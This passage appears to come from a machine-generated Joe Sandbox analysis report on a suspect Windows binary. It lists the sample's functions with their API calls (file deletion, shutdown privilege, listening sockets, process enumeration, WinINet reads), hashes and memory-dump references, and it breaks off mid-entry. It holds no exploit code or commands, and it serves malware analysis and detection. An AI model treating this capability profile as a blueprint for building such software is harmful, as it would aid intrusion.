Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 27e1a9175cfdb7fcc031b66e508879109a01bbc8b5e14bbfcd76a3429850b855
Instruction ID: 643623809d47f3290ebbfa97070198bfa2d8bf887f4ac39415fb6ba4173794fa
Opcode Fuzzy Hash: 27e1a9175cfdb7fcc031b66e508879109a01bbc8b5e14bbfcd76a3429850b855
Instruction Fuzzy Hash: BA12AD70A00A09DFCF04DFA5D981AEEB7F5FF88310F104529E846A7290EB39AD55EB51

Function 00F63B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00F04750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F04743,?,?,00F037AE,?), ref: 00F04770

Part of subcall function 00F64A31: GetFileAttributesW.KERNEL32(?,00F6370B), ref: 00F64A32

FindFirstFileW.KERNEL32(?,?), ref: 00F63B89
DeleteFileW.KERNEL32(?,?,?,?), ref: 00F63BD9
FindNextFileW.KERNEL32(00000000,00000010), ref: 00F63BEA
FindClose.KERNEL32(00000000), ref: 00F63C01
FindClose.KERNEL32(00000000), ref: 00F63C0A

Strings

\*.*, xrefs: 00F63B5B

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: c4c46af3d702474d1302b7a911b1641ff472087de45d98441f86a8d013de1e42
Instruction ID: 3700299efb3ab7174b1e12d9fbe9e60f1067c73c1dba38bc7e1e8074948e6718
Opcode Fuzzy Hash: c4c46af3d702474d1302b7a911b1641ff472087de45d98441f86a8d013de1e42
Instruction Fuzzy Hash: D0317A31408384AFC601EF24DC918AFB7E8AE91314F404A2DF4D6921D1EB25EA0DFB62

Function 00F651BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00F587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F5882B
Part of subcall function 00F587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F58858
Part of subcall function 00F587E1: GetLastError.KERNEL32 ref: 00F58865

ExitWindowsEx.USER32(?,00000000), ref: 00F651F9

Strings

@, xrefs: 00F651EC
, xrefs: 00F651E7
SeShutdownPrivilege, xrefs: 00F651C9

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: ac6416cda9e7eef65291b328d25542eed93292e18cd94ab69d0033dbe5985eba
Instruction ID: a4df0f5a28a70df1d858023571b50793e2c16cb2283930febeb3a395cefdf079
Opcode Fuzzy Hash: ac6416cda9e7eef65291b328d25542eed93292e18cd94ab69d0033dbe5985eba
Instruction Fuzzy Hash: 69012B32BA16156FF7286278ACAAFFB7358DB05B51F240461FD03F60D2DA515C05B690

Function 00F76283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00F762DC
WSAGetLastError.WSOCK32(00000000), ref: 00F762EB
bind.WSOCK32(00000000,?,00000010), ref: 00F76307
listen.WSOCK32(00000000,00000005), ref: 00F76316
WSAGetLastError.WSOCK32(00000000), ref: 00F76330
closesocket.WSOCK32(00000000,00000000), ref: 00F76344

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 3b7d4e1589e4b1c2445267f7eef8befacc750ae547b9101f42da166008a21d62
Instruction ID: 6bb18dc230e831a9e2b26a0579aef85189d0e99c32fcb41ec97640eabc1365ac
Opcode Fuzzy Hash: 3b7d4e1589e4b1c2445267f7eef8befacc750ae547b9101f42da166008a21d62
Instruction Fuzzy Hash: 4A21EE716006049FCB00EF64CC45B7EB7A9EF48320F548159E81AE73D2C770AD04EB52

Function 00F15520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00F20DB6: std::exception::exception.LIBCMT ref: 00F20DEC
Part of subcall function 00F20DB6: __CxxThrowException@8.LIBCMT ref: 00F20E01

_memmove.LIBCMT ref: 00F50258
_memmove.LIBCMT ref: 00F5036D
_memmove.LIBCMT ref: 00F50414

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: bbbdd8465b5400b13681d5672ad08325ebce8760089be26ae0c907cd0ae775a1
Instruction ID: e28f4423dd1528c626bcadbb426d7ab8d12b2049239baee6776190b3753ccafe
Opcode Fuzzy Hash: bbbdd8465b5400b13681d5672ad08325ebce8760089be26ae0c907cd0ae775a1
Instruction Fuzzy Hash: 7802F171E00609DFCF04DF64D981AAEBBB5EF84300F1480A9E906DB295EF35D954EB91

Function 00F01287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623

DefDlgProcW.USER32(?,?,?,?,?), ref: 00F019FA
GetSysColor.USER32(0000000F), ref: 00F01A4E
SetBkColor.GDI32(?,00000000), ref: 00F01A61

Part of subcall function 00F01290: DefDlgProcW.USER32(?,00000020,?), ref: 00F012D8

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 742f10f15c255130d050414e02900951c90bbd6872dfe241361a15677fa4aea0
Instruction ID: f9e5e71d4f49a7e0a9691d5cb561643e87b504a9ac0496f67934eb7ce3f66c3a
Opcode Fuzzy Hash: 742f10f15c255130d050414e02900951c90bbd6872dfe241361a15677fa4aea0
Instruction Fuzzy Hash: 90A14772606549BEEB29AB688C69FBF355CFF41361F14011AF602D61D2CB2C9D41B3B1

Function 00F6BCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00F6BCE6
_wcscmp.LIBCMT ref: 00F6BD16
_wcscmp.LIBCMT ref: 00F6BD2B
FindNextFileW.KERNEL32(00000000,?), ref: 00F6BD3C
FindClose.KERNEL32(00000000,00000001,00000000), ref: 00F6BD6C

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: f53adbef8b3eb45c09e44aa268d42108b4e408f6232752f93c3da13da77c3090
Instruction ID: d20f95a39f803a12953515abde9e6af414f19752c2c733161b2cab30f9b6870e
Opcode Fuzzy Hash: f53adbef8b3eb45c09e44aa268d42108b4e408f6232752f93c3da13da77c3090
Instruction Fuzzy Hash: 08519D75A046029FC714DF28C890EAAB3E8EF49324F14465DE956CB3A1DB34ED44EB91

Function 00F76747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00F77D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00F77DB6

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00F7679E
WSAGetLastError.WSOCK32(00000000), ref: 00F767C7
bind.WSOCK32(00000000,?,00000010), ref: 00F76800
WSAGetLastError.WSOCK32(00000000), ref: 00F7680D
closesocket.WSOCK32(00000000,00000000), ref: 00F76821

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: c0ceab8ab3abea1801c9ef19374747478357b5f55c3bfaafa8383a7d05d62c97
Instruction ID: 91e89e186cb2f55b821462f817f29f7dd7981047a6a4c244aa57bd3999ca35f3
Opcode Fuzzy Hash: c0ceab8ab3abea1801c9ef19374747478357b5f55c3bfaafa8383a7d05d62c97
Instruction Fuzzy Hash: 0D41E071A00600AFDB10AF248C82F7E77E89B44764F44815CFA59AB3C3DAB89D01B792

Function 00F85376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00F853C5
IsWindowEnabled.USER32 ref: 00F853D3
GetForegroundWindow.USER32(?,?,00000001), ref: 00F853E0
IsIconic.USER32 ref: 00F853EE
IsZoomed.USER32 ref: 00F853FC

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 6cf3b48acae06f100da27b5291ee5172861946a783d6915665572afc20622567
Instruction ID: 86b651f8a1a39a4d6d9b35c8bc43160b6faa94d6038de12136dd4c5f71d08c70
Opcode Fuzzy Hash: 6cf3b48acae06f100da27b5291ee5172861946a783d6915665572afc20622567
Instruction Fuzzy Hash: 0111C431700915AFEB217F26DC44AAE7B9AEF44BA1B444438F845D7281DBB4DC01A7A0

Function 00F580A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F580C0
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F580CA
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F580D9
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F580E0
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F580F6

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 30dde5682290ada0360a26c03aea7d5b55359a556f80d5c5919a261f52bd22b3
Instruction ID: 0e9dfabbf626a9cfc5e302fb12db4f3aa7be980ab355ad8261f31bdbeb392410
Opcode Fuzzy Hash: 30dde5682290ada0360a26c03aea7d5b55359a556f80d5c5919a261f52bd22b3
Instruction Fuzzy Hash: 51F04F31240708EFEB104FA5EC8DEB73FACEF497A5B100025FA45D6150DA619C4AFB60

Function 00F04B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00F04AD0), ref: 00F04B45
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00F04B57

Strings

kernel32.dll, xrefs: 00F04B40
GetNativeSystemInfo, xrefs: 00F04B51

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 4e55ca520eca2970d4a950b541fb6725b21062c6bfc8ee9eb4ae7fac89a0a3f4
Instruction ID: b3d7b385b44a05d51eab722dd8ca97c2cff1b52810f8f62b1dbcc9072dfe1294
Opcode Fuzzy Hash: 4e55ca520eca2970d4a950b541fb6725b21062c6bfc8ee9eb4ae7fac89a0a3f4
Instruction Fuzzy Hash: EBD0C2B0E00717CFC720AF31D81CB8272D4AF80360B10883A9481C2190D674E484E714

Function 00F13030 Relevance: 6.6, APIs: 4, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: 0776036e47d962c4e9870ba2d679e07ae4466310ab0fa6b6b7c162a36e018dcf
Instruction ID: 6165f6ec8a0d6453b99aa53d43f1a4e1d0e5e87243a95d14acdfecf2079c4694
Opcode Fuzzy Hash: 0776036e47d962c4e9870ba2d679e07ae4466310ab0fa6b6b7c162a36e018dcf
Instruction Fuzzy Hash: 7522BE72A083009FC724DF14C881BAFB7E4AF85710F50491DF99A97292EB75E944EB93

Function 00F7EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00F7EE3D
Process32FirstW.KERNEL32(00000000,?), ref: 00F7EE4B

Part of subcall function 00F07DE1: _memmove.LIBCMT ref: 00F07E22

Process32NextW.KERNEL32(00000000,?), ref: 00F7EF0B
CloseHandle.KERNEL32(00000000,?,?,?), ref: 00F7EF1A

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 627ebbb01bfb7b347a260252398edc7e9f9341751e6d363e24340da3759d76b5
Instruction ID: 19c6d803fc5d59c31f46d38ef637aec80b567bad0b84ee1ce129141b3fd38478
Opcode Fuzzy Hash: 627ebbb01bfb7b347a260252398edc7e9f9341751e6d363e24340da3759d76b5
Instruction Fuzzy Hash: 1251A3715087059FD310EF20CC85EABB7E8EF98710F50492DF595972A1EB74E908EB92

Function 00F5E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00F5E628

Strings

|, xrefs: 00F5E658
(, xrefs: 00F5E66E

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 2fadb2ac8c2144e76717cd8b4aacab4828dbf3adc43f934a18e8df5c02a8ee93
Instruction ID: 90695e76c9021414f3be0e5834e20ac4a1427b56b04070bc6f8b3539324fbd09
Opcode Fuzzy Hash: 2fadb2ac8c2144e76717cd8b4aacab4828dbf3adc43f934a18e8df5c02a8ee93
Instruction Fuzzy Hash: 0F323775A007059FD728CF29D481A6AB7F0FF48320B15C56EE99ADB3A2D770E941CB40

Function 00F722EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00F7180A,00000000), ref: 00F723E1
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00F72418

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: d6102175d7b92b81a43469ca2f5d259e54eb1ab9f40558fdda4e07a3984be365
Instruction ID: c0b11c2acfda79fcb1771f3be179f5827d0d01668f22b1966b71dc9ed3e1824f
Opcode Fuzzy Hash: d6102175d7b92b81a43469ca2f5d259e54eb1ab9f40558fdda4e07a3984be365
Instruction Fuzzy Hash: 4141E572904209BFEBA0DE95DC81FBF77BCEB40724F10806BF649A6141DA749E41B652

Function 00F6B3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00F6B40B
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00F6B465
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00F6B4B2

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 04535602ea7789ce491688da2970f52f0b46a137e50a2cf850a9b6178f0004d4
